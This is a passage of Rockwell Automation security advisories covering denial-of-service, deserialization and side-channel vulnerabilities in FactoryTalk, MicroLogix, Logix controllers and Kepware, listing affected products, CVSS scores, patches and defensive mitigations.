  • Securely transmit project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, email stored project files that use Source Key Protection only to known recipients and encrypt the files such that only the target recipient can decrypt the content.
  • Restrict the physical network access to controllers containing password protected content only to authorized parties to help prevent unauthorized uploading of protected material in an ACD file. Note: For some customers, FactoryTalk Security software may be a suitable option to assist customers with applying a role-based access control solution to their system. FactoryTalk Security was integrated into RSLogix 5000 v10.00 and above.
  •  Adopt a password management practice to periodically change passwords applied to routines and Add-On Instructions to help mitigate the risk that a learned password may remain useable for an extended period or indefinitely.


IMPORTANT: Files with Source Key Protection password protected content that have been opened and updated using v20.03 software and above will no longer be compatible with earlier versions of the software. For example, a v20.01 project file with password protected content that has been opened and re-saved using v20.03 software can only be opened with v20.03 software and higher. Also, a v21.00 project file with protected content that has been opened and re-saved using v21.03 software can only be opened with v21.03 and higher versions of software.

For the procedure to update older project files to v20.03 (or later), refer to the FAQ for V20.03 at KnowledgeBase ID: IN64.

General Security Guidelines

Software/PC-based Mitigation Strategies
The following Software/PC Mitigations may be appropriate to include when the vulnerability is within a software product running on a PC:
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715..
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS

High
PN1540 | PN1540 | FactoryTalk Linx and FactoryTalk Services Platform Contain Denial-of-Service Vulnerabilities
Published Date:
January 22, 2021
Last Updated:
January 22, 2021
CVE IDs:
CVE-2020-5806, CVE-2020-5801, CVE-2020-5802, CVE-2020-5807
Products:
FactoryTalk Linx Gateway, FactoryTalk Services Platform, FactoryTalk Linx / RSLinx Enterprise
CVSS Scores:
7.5, 6.2, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.0
Revision History

Version 3.0 - January 22, 2021. Updated and Corrected Risk Mitigation & User Actions.


Version 2.0 - January 14, 2021. Updated Risk Mitigation & User Actions.


Version 1.0 - December 27, 2020. Initial Version.

Executive Summary

Rockwell Automation received a report from Tenable regarding 4 vulnerabilities. Three of these vulnerabilities are within FactoryTalk® Linx software and the fourth is in FactoryTalk Services Platform. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Nearly all FactoryTalk software ships with a FactoryTalk Services Platform. If you are unsure if you have the FactoryTalk Services Platform installed, please see Knowledgebase ID QA5266 for additional details.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Vulnerability Affected Products
CVE-2020-5801 FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5802 FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5806 FactoryTalk Linx versions 6.10, 6.11, and 6.20.
CVE-2020-5807 FactoryTalk Services Platform version 6.20 and earlier.

Vulnerability Details

CVE-2020-5801 and CVE-2020-5802: Denial-of-Service due to Unhandled Exception
An unhandled exception vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial of service condition.

CVSS v3.1 Base Score: 7.5 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5806: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a local, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.2 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5807: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Services Platform. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted log file to a local user. When the malicious log file is opened by a local user, it can cause a buffer overflow in the FactoryTalk Services Platform resulting in temporary denial-of-service conditions. Users can recover from the condition by reopening the impacted software.

CVSS v3.1 Base Score: 4.3 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Version 3.0: Correction
Vulnerability Suggested Actions
CVE-2020-5801
CVE-2020-5802		 Version 2.0: Apply patch found in BF26285.

Version 1.0: Apply Internet Protocol Security (IPSec) to provide security services for IP network traffic. For more information on how to apply IPSec, see Knowledge Base ID QA46277 .
CVE-2020-5806 Version 3.0: Apply patch found in BF26287
CVE-2020-5807 For FactoryTalk Services Platform v6.20 see Patch Answer ID BF26157.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID BF7490.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or other similar allow list applications that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not open untrusted .ftd files with FactoryTalk Services Platform.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations
Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1113 | PN1113 | CVE-2020-0601 Impact to Rockwell Automation Products
Published Date:
January 20, 2021
Last Updated:
January 20, 2021
CVE IDs:
CVE-2020-0601
Products:
FactoryTalk Analytics for Devices, FactoryTalk Analytics LogixAI, 1756 ControlLogix I/O
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.0
Revision History
Version 2.0 - January 20, 2021 - Updated Risk Mitigations and Recommended User Actions.
Version 1.1 - January 31, 2020
Version 1.0 - January 17, 2020

Executive Summary

On Tuesday, January 14, 2020, Microsoft issued a patch and advisory addressing a major crypto vulnerability affecting Windows 10, Windows 10 IoT Core and Enterprise, and Windows Server 2016 and 2019. This vulnerability, identified as CVE-2020-0601, is also being referred to as "CurveBall," and is a vulnerability that exists in the way Crypt.32.dll validates Elliptic Curve Cryptography (ECC) certificates. This vulnerability breaks the chain of trust and could allow an attacker to sign a malicious executable, allow interception and modification of TLS-encrypted traffic, or spoof Authenticode code signing certificates. The National Security Agency (NSA) coordinated the information and release of this vulnerability with Microsoft.

The Rockwell Automation® Product Security Incident Response Team (PSIRT) has been tracking this vulnerability since its release. At the time of writing, Rockwell Automation products are not being directly targeted, but are impacted by vulnerable Windows 10 IoT installations. Please see the Affected Products for a full list of potentially affected Rockwell Automation products.

An investigation is ongoing. Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as information becomes available.

Affected Products

Microsoft Windows 10 IoT Core and Enterprise editions are impacted by this vulnerability. At of the time of publishing, the following Rockwell Automation products are impacted by CVE-2020-0601:

  • CompactLogix 5480 Controllers
  • FactoryTalk Analytics for Devices
  • FactoryTalk Analytics LogixAI
  • ControlLogix Compute Module (1756-CMS1B1)

Vulnerability Details

CVE: 2020-0601: Windows CryptoAPI Spoofing Vulnerability

Description: A vulnerability exists in the way Windows CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

  • Microsoft Assigned CVSSv3.0 Base Score: 8.1
  • Microsoft Assigned CVSSv3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Risk Mitigation & User Action

Customers should understand their potential exposure to this vulnerability by completing a thorough asset inventory and assessment.

Vulnerability

Rockwell Automation Product

Suggested Actions

CVE-2020-0601

  • Compact Logix 5480 Controllers
  • ControlLogix Compute Module (1756-CMS1B1)

Microsoft released a patch for affected versions of Windows on January 14, 2020.
Patch via Windows Update Service or normal patching process.

CVE-2020-0601

  • FactoryTalk Analytics Logix AI

Install the Microsoft Cumulative Security Updates on FactoryTalk Analytics LogixAI, refer to QA58887.

Otherwise, Rockwell Automation will provide a firmware update for the products noted. Patches are not yet available for these products. When the patches are available, this article will be updated.

Vulnerability

Rockwell Automation Product

Suggested Actions

CVE-2020-0601

  • FactoryTalk Analytics for Devices

To reduce risk, customers should ensure they are employing proper network segmentation and security controls.
Specifically, network exposure for all control system devices should be minimized and control systems should be
behind firewalls and isolated from other networks when possible.
Refer to the Deploying a Resilient Converged Plantwide Ethernet Architecture Design and Implementation Guide.

Customers using Rockwell Automation industrial compute solutions, such as VersaView computers, Industrial Data Centers, etc, are recommended to regularly inventory and patch their host operating systems.

Update on 1/31/2020: Rockwell Automation MS Patch Qualification team successfully qualified the Microsoft patch related to Curveball. Full results and other useful information can be found here.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that communications from unauthorized sources are blocked.
  • Use trusted software, software patches, antivirus/antimalware programs, and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1548 | PN1548 | Allen-Bradley MicroLogix 1100 Programmable Logic Controller IPv4 Denial-of-Service Vulnerability
Published Date:
January 19, 2021
Last Updated:
January 19, 2021
CVE IDs:
CVE-2020-6111
Products:
1763 MicroLogix 1100
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 19, 2021. Iniital Release.

Executive Summary

Rockwell Automation received a report from the Cisco® Talos™ team, regarding a vulnerability in the Allen-Bradley® MicroLogix™ 1100 controller. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Customers using affected versions of this controller are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1100, all versions.

Vulnerability Details

CVE-2020-6111: Improper Processing IPv4 Packets may result in Denial-of-Service Conditions
A vulnerability exists with the processing of ICMP packets with an invalid IPv4 length in the MicroLogix 1100. This vulnerability could allow a remote, unauthenticated attacker to send malformed packets and cause the controller to enter 8H Hard Fault. This event would lead to denial-of-service conditions. To recover from the condition, the controller must be power cycled and the project redownloaded.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.
Vulnerability Suggested Actions
CVE-2020-6111 Migrate to MicroLogix 1400 and apply firmware v21.006 or later.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware key mode setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

Medium
PN1542 | PN1542 | Side-Channel Issue on NXP 7x Secure Authentication Microcontrollers May Lead to ECC Key Extraction
Published Date:
January 14, 2021
Last Updated:
January 14, 2021
CVE IDs:
CVE-2021-3011
Products:
5069-L330ERMS2K, 5069-L340ERMS2, PowerFlex 6000, 5069-L3100ERS2, PowerFlex 755, 5069-L3100ERMS2, 5069-L306ERMS2, 2198 Kinetix 5700 Drive, iTRAK, 5069-L350ERMS2K, 5069-L320ERMS2K, 5069-L320ERMS2, 5069-L330ERS2K, 5069-L330ERMS2, 5069-L320ERS2K, 5069-L350ERS2K, 5069 Compact GuardLogix 5380, 5069-L380ERMS2, PowerFlex 755T, 1756 ControlLogix, 5069-L350ERMS2, 5069-L380ERS2
CVSS Scores:
4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 14, 2021. Initial Release.

Executive Summary

A report has been released regarding a vulnerability in the NXP 7x series microcontroller. If successfully exploited, this vulnerability may result in the extraction of a unique private key. This unique key is used to verify the authenticity of the affected Rockwell Automation® products.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • 1756-EN2T
  • 1756-EN4T
  • 1756-EN4TR
  • ControlLogix® 5580 Series
    • 1756-L81EK, -L82EK, -L83EK, -L84EK, -L85EK
    • 1756-L81EP, -L83EP, -L85EP
    • 1756-L81E-NSE, 1756-L82E-NSE, 1756-L83E-NSE, 1756-L84E-NSE, 1756-L85E-NSE
    • 1756-L81EXT, 1756-L82EXT, 1756-L83EXT, 1756-L84EXT, 1756-L85EXT
  • GuardLogix 5580 Series
    • 1756-L81ES, -L82ES, -L83ES, -L84ES, -L8SP
    • 1756-L81ESK, -L82ESK, -L83ESK, -L84ESK, -L8SPK
  • Compact GuardLogix® 5380 Series
    • 5069-L306ERMS2
    • 5069-L306ERMS3
    • 5069-L306ERS2
    • 5069-L3100ERMS2
    • 5069-L3100ERMS3
    • 5069-L3100ERS2
    • 5069-L310ERMS2
    • 5069-L310ERMS3
    • 5069-L310ERS2
    • 5069-L320ERMS2
    • 5069-L320ERMS2K
    • 5069-L320ERMS3
    • 5069-L320ERMS3K
    • 5069-L320ERS2
    • 5069-L320ERS2K
    • 5069-L330ERMS2
    • 5069-L330ERMS2K
    • 5069-L330ERMS3
    • 5069-L330ERMS3K
    • 5069-L330ERS2
    • 5069-L330ERS2K
    • 5069-L340ERMS2
    • 5069-L340ERMS3
    • 5069-L340ERS2
    • 5069-L350ERMS2
    • 5069-L350ERMS2K
    • 5069-L350ERMS3
    • 5069-L350ERMS3K
    • 5069-L350ERS2
    • 5069-L350ERS2K
    • 5069-L380ERMS2
    • 5069-L380ERMS3
    • 5069-L380ERS2
  • CompactLogix™ 5380 Series
    • 5069-L306ER
    • 5069-L306ERM
    • 5069-L310ER
    • 5069-L310ER-NSE
    • 5069-L310ERM
    • 5069-L320ER
    • 5069-L320ERM
    • 5069-L320ERMK
    • 5069-L320ERP
    • 5069-L330ER
    • 5069-L330ERM
    • 5069-L330ERMK
    • 5069-L340ER
    • 5069-L340ERM
    • 5069-L340ERP
    • 5069-L350ERM
    • 5069-L350ERMK
    • 5069-L380ERM
    • 5069-L3100ERM
  • 5069-AEN2TR
  • CompactLogix™ 5480 Series
    • 5069-L4100ERMW
    • 5069-L4200ERMW
    • 5069-L430ERMW
    • 5069-L450ERMW
    • 5069-L46ERMW
  • iTRAK® 5730 Small Frame
  • iTRAK 5750C
  • Kinetix® 5700 Series B - DAI, HPI, LFI, AFE
  • PowerFlex® 6000T
  • PowerFlex 755 TL
  • PowerFlex 755 TM
  • PowerFlex 755 TR

Vulnerability Details

CVE-2021-3011: Side-Channel Leakage of Unique ECC Private Key on NXP 7X Series Chip
The NXP A700X chip contains a vulnerability that may allow an attacker to physically extract ECC private keys. Expertise and specialized equipment are required to successfully open the package, extract, and process the side-channel leakage. Successful exploit of this vulnerability may allow an attacker to obtain the unique ECC private key for that chip only. The chip will also be physically damaged. For controllers, the current use of this unique key is only used during the initial deployment of CIP Security.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Risk Mitigation & User Action

Rockwell Automation encourages customers, when possible, to follow industry best practices for physical access including, but not limited to:
•           Limiting physical access to authorized personnel: control room, cells/areas, control panels, and devices.
•           Providing training and communication to personnel to raise awareness of threats.
•           Implementing physical barriers such as locked cabinets.

Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

General Security Guidelines

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

High
PN1541 | PN1541 | FactoryTalk AssetCentre affected by M and M Software fdtCONTAINER Remote Code Execution Vulnerability
Published Date:
January 11, 2021
Last Updated:
January 11, 2021
CVE IDs:
CVE-2020-12525
Products:
FactoryTalk AssetCentre
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
January 11, 2021. Initial Version.

Executive Summary

Rockwell Automation received a report from M&M Software regarding vulnerabilities in the fdtCONTAINER component. fdtCONTAINER is distributed as part of FactoryTalk® AssetCentre software. If successfully exploited, this vulnerability may result in remote code execution.

This vulnerability does not impact FactoryTalk AssetCentre users who have not purchased the Process Device Configuration (SKU: 9515-ASTPRD*) capability or Calibration Management capability (SKU: 9515-ASTCAL*).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre v9.00.00 and below with Process Device Configuration or Calibration Management capabilitiy.

Vulnerability Details

CVE-2020-12525: Deserialization of Untrusted Data May Result in Remote Code Execution
A deserialization vulnerability exists in the ftdCONTAINER component in FactoryTalk AssetCentre. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted project file to a local user. When the malicious project file is opened by the local user, it may execute malicious code with the user rights of FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk AssetCentre are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
 CVE-2020-12525
Deny access to PDC Field Edition. To do this, follow the steps below.


To deny access to PDC Field Edition:
  1. Open FactoryTalk Admin Console
  2. Select “System”
  3. Select “Policies”
  4. Select “FactoryTalk AssetCentre”
  5. Open “Feature Security Properties”
  6. Locate “Run PDC Field Edition” under “Process Device Configuration Policies” and select the ellipses (…) next to “Configure Security”.
  7. Select the “Deny” Checkboxes for “Administrators” and “All Users”
  8. Select “OK”
  9. Select “Apply”

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
  • Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

Software/PC-based Mitigation Strategies
  • Do not use standalone PDC Field Edition
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or another similar allow list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files with FactoryTalk AssetCentre.
  • Do not click or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical
PN1539 | PN1539 | Vulnerabilities in the Kepware OPC UA server interface may lead to Denial-of-Service Conditions or Data Leak
Published Date:
December 17, 2020
Last Updated:
December 17, 2020
CVE IDs:
CVE-2020-27267, CVE-2020-27263
Products:
ThingWorx Industrial Connectivity, ThingWorx, Kepserver Enterprise
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - December 17, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding vulnerabilities in the Kepware OPC UA server interface for KEPServer Enterprise, ThingWorx® Kepware Server, and ThingWorx Industrial Connectivity. If successfully exploited, these vulnerabilities may result in the product ceasing to function. This may cause the following impacts: a loss of ability to configure the application, a loss of data, a loss of data acquisition, or a loss communication with control system assets.

Customers using affected versions of this server are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

KEPServer Enterprise, versions 6.6.504.0; 6.9.572.0
ThingWorx Industrial Connectivity, all versions
ThingWorx Kepware Server, all versions

Vulnerability Details


CVE-2020-27263: Heap-based Buffer Overflow
The affected products are vulnerable to a heap-based buffer overflow. Opening a specifically crafted OPC message could all a remote attacker to crash the server and potentially leak data.

CVSS v3.1 Base Score: 9.1 [Critical]
CVSS Vector: CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H


CVE-2020-27267: Use After Free
The affected products are vulnerable to a use after free vulnerability, which may allow an attacker to create and close OPC UA connections at a high rate that may cause a server to crash. Successful exploitation of this vulnerability may result in denial-of-service conditions.

CVSS v3.1 Base Score: 7.5 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these options with the general security guidelines to employ multiple strategies simultaneously.

PTC recommends that users upgrade to the most current supported version.
Recommended User Actions
Base Version
Affected Product 6.6
 6.7 6.8 6.9
KEPServer Enterprise (Download) Apply version
6.6.550.0		 -- -- Apply version 6.9.584.0
Thingworx Kepware Server (Download) -- -- Apply version 6.8.839.0 Apply version 8.9.584.0
Thingworx Industrial Connectivity (Download) Apply version 8.4
(6.6.362.0)		 Apply version 8.5(6.7.1068) -- --

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
